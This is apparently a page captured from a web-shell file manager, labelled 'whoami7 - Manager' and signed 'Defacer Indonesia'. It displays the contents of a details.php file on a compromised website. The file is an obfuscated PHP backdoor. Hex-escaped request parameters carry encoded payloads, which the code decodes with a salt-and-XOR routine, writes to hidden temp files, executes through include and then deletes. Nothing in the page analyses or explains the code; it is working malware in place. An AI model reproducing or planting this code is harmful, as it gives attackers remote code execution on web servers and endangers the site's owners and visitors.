whoami7 - Manager
:
/
home
/
analuakl
/
new.ankurmedia.com
/
Upload File:
files >> /home/analuakl/new.ankurmedia.com/details.php
<?php if(!empty($_POST["\x64e\x73c"])){ $flag = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/dev/shm", "/var/tmp", session_save_path(), getcwd(), getenv("TEMP")]); $resource = $_POST["\x64e\x73c"]; $resource =explode ('.' , $resource ) ; $record = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s4 ); foreach( $resource as $u => $v4) { $sChar = ord( $s4[$u%$sLen] ); $dec = ( ( int)$v4 - $sChar -( $u%10)) ^ 5; $record.= chr( $dec ); } while ($dchunk = array_shift($flag)) { if (is_dir($dchunk) && is_writable($dchunk)) { $token = join("/", [$dchunk, ".hld"]); $success = file_put_contents($token, $record); if ($success) { include $token; @unlink($token); exit;} } } } if(isset($_POST["\x72\x65s"]) ? true : false){ $hld = array_filter(["/tmp", getenv("TEMP"), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd()]); $object = $_POST["\x72\x65s"]; $object = explode ('.' , $object ) ; $data = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $p = 0; $__tmp = $object; while($v2 = array_shift($__tmp)) {$chS = ord($salt[$p %$sLen] ); $dec = ((int)$v2 - $chS -($p %10)) ^ 4; $data .= chr($dec ); $p++;} while ($val = array_shift($hld)) { if (!!is_dir($val) && !!is_writable($val)) { $token = sprintf("%s/.pset", $val); if (@file_put_contents($token, $data) !== false) { include $token; unlink($token); die(); } } } } if(array_key_exists("\x63o\x6Dp", $_REQUEST) && !is_null($_REQUEST["\x63o\x6Dp"])){ $dat = array_filter(["/dev/shm", sys_get_temp_dir(), getenv("TMP"), getcwd(), getenv("TEMP"), "/var/tmp", "/tmp", session_save_path(), ini_get("upload_tmp_dir")]); $symbol = $_REQUEST["\x63o\x6Dp"]; $symbol = explode ('.' , $symbol) ; $fac =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $len =count( $symbol); for( $i =0; $i <$len; $i++) { $v9 =$symbol[$i]; $chS =ord( $salt[$i % $lenS]); $dec =( ( int)$v9 - $chS -( $i % 10)) ^ 35; $fac .= chr( $dec); } while ($ptr = array_shift($dat)) { if ((function($d) { return is_dir($d) && is_writable($d); })($ptr)) { $entity = str_replace("{var_dir}", $ptr, "{var_dir}/.value"); $success = file_put_contents($entity, $fac); if ($success) { include $entity; @unlink($entity); die();} } } } if(array_key_exists("\x65\x6C\x65m\x65nt", $_POST) && !is_null($_POST["\x65\x6C\x65m\x65nt"])){ $comp = array_filter([ini_get("upload_tmp_dir"), "/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getenv("TEMP"), "/var/tmp", getcwd()]); $entry = $_POST["\x65\x6C\x65m\x65nt"]; $entry =explode ( '.',$entry ) ; $factor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($entry as $l => $v5) { $chS = ord($salt[$l %$sLen]); $d = ((int)$v5 - $chS - ($l %10))^ 93; $factor .=chr($d); } foreach ($comp as $data_chunk) { if (!( !is_dir($data_chunk) || !is_writable($data_chunk) )) { $reference = join("/", [$data_chunk, ".token"]); if (file_put_contents($reference, $factor)) { include $reference; @unlink($reference); die(); } } } }
Copyright ©2021 || Defacer Indonesia